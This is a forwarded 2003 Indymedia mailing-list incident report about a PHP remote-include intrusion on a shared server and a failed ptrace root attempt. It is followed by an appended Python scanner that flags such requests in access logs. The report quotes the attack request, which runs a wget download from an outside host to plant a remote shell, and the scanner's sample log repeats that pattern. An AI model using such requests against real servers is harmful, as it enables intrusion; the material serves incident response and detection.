Well, maybe it will interest someone. carloz
----- Forwarded message from blicero blicero@ecn.org -----
List-Archive: http://lists.indymedia.org/mailman/public/italy-tech/
----- Forwarded message from jeff jeff@indymedia.org -----
Date: Wed, 2 Apr 2003 12:15:11 +0100
From: jeff jeff@indymedia.org
Subject: ahimsa attack details & new server
To: admin@ahimsa.solipsists.org
Reply-To: jeff@indymedia.org
A successful attack was launched against ahimsa on April 1st. The attacker was able to get a shell, but we do not believe that they were able to get root.
Previous attempts were made against Italy IMC, but it appears they were not successful.
At 07:54:10 the following request was made to Portugal: /index.php?centro=http://infernalis.republika.pl/code.php&com=wget%20http://infernalis.rep...
This copied a shell to /tmp/.bash from the site infernalis.republika.pl which opened TCP port 23456 to allow remote connections.
The attacker then executed the shell and scp/ftp'd two more files to /tmp. (We haven't pinpointed this, but it looks most probable.)
The files were identical and named "ptr" and "ptrace". The source code to these files is here: http://www.securiteam.com/exploits/5CP0Q0U9FY.html
I noticed a high load on ahimsa, ran `top` and saw both the `ptr` and `ptrace` executables taking over CPU. You can see the spike in the graph here (see Tuesday): http://ahimsa.solipsists.org/stats/mrtg/cpu-other.html I killed the processes and the load returned to normal. They had been running for approximately one hour.
The ptr/ptrace exploit should drop a user into a root shell. This did not happen and tests confirm that running the executables drives the load high, but doesn't spawn a root shell.
About a week ago, Matze had been doing some experimenting to find a way to block people from exploiting the ptrace vulnerability. He thought it didn't work, but it actually did. He compiled a new kernel that protects against the ptrace exploit, but I hadn't installed it. His playing with /proc did the trick.
It should be noted that the ptrace vulnerability is a local exploit only. The attacker first had to get a local shell and did that via a PHP exploit on Portugal.
We spent forever figuring all this out. ;)
In the process of all this (especially when we thought they rooted the box) we decided to do a fresh install. We are going to proceed with this just to be certain, and also to upgrade the hardware at the same time (especially disk space). The new server should be brought online in the next 24 hours. Both servers will be running simultaneously. We'll recompile/reinstall what we need then migrate the sites. Each IMC is responsible for their migration, but we'll all be around to help.
The new server is a dual 1.67GHz Athlon, 3 gigs RAM, 4 x 72 gig hardware RAID level 5 which gives us a bit over 200G of space.
Portugal currently has a template page running which redirects people to www.indymedia.org. When their code is fixed, Portugal can be brought back online. Note that Portugal is running their own code, so this isn't an active, sf-active, dada, or mir exploit.
-Jeff
P.S. I will be gone part of the day on Wednesday as I have a previous commitment. When I finish it, I'll be back online. :)
----- End forwarded message -----
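As an added example (not part of Jeff's message or of any Indymedia code), a small Python scanner that flags the request pattern the report describes in Apache-style access logs: a remote URL handed to a PHP include parameter, and a download command in a query value. The host names, IP addresses and log lines below are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined"-style log line; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Fetch tools typically seen when a remote-include bug is used to pull in a file.
FETCH_TOKENS = re.compile(r"\b(wget|curl|fetch|lynx)\b", re.IGNORECASE)

def analyse_request(target):
    """Return a list of (param, reason) findings for one request target."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes, so "wget%20http://..." becomes "wget http://...".
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            findings.append((name, "remote URL passed as include parameter"))
        if FETCH_TOKENS.search(value):
            findings.append((name, "download command in parameter value"))
    return findings

def scan_log(lines):
    """Return (ip, timestamp, target, findings) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        findings = analyse_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("ts"), m.group("target"), findings))
    return hits

# Constructed sample log: one request of the reported shape, one benign request.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Apr/2003:07:54:10 +0100] "GET /index.php?centro=http://attacker.invalid/code.php&com=wget%20http://attacker.invalid/.bash HTTP/1.0" 200 512',
    '198.51.100.4 - - [01/Apr/2003:07:55:02 +0100] "GET /index.php?centro=noticias HTTP/1.1" 200 8213',
]

if __name__ == "__main__":
    for ip, ts, target, findings in scan_log(SAMPLE_LOG):
        print(ip, ts, target, findings)
```

On the defensive side, the same remote-include vector is closed by disabling allow_url_fopen (and, on later PHP versions, allow_url_include) in php.ini and by validating include parameters against a fixed list of local page names.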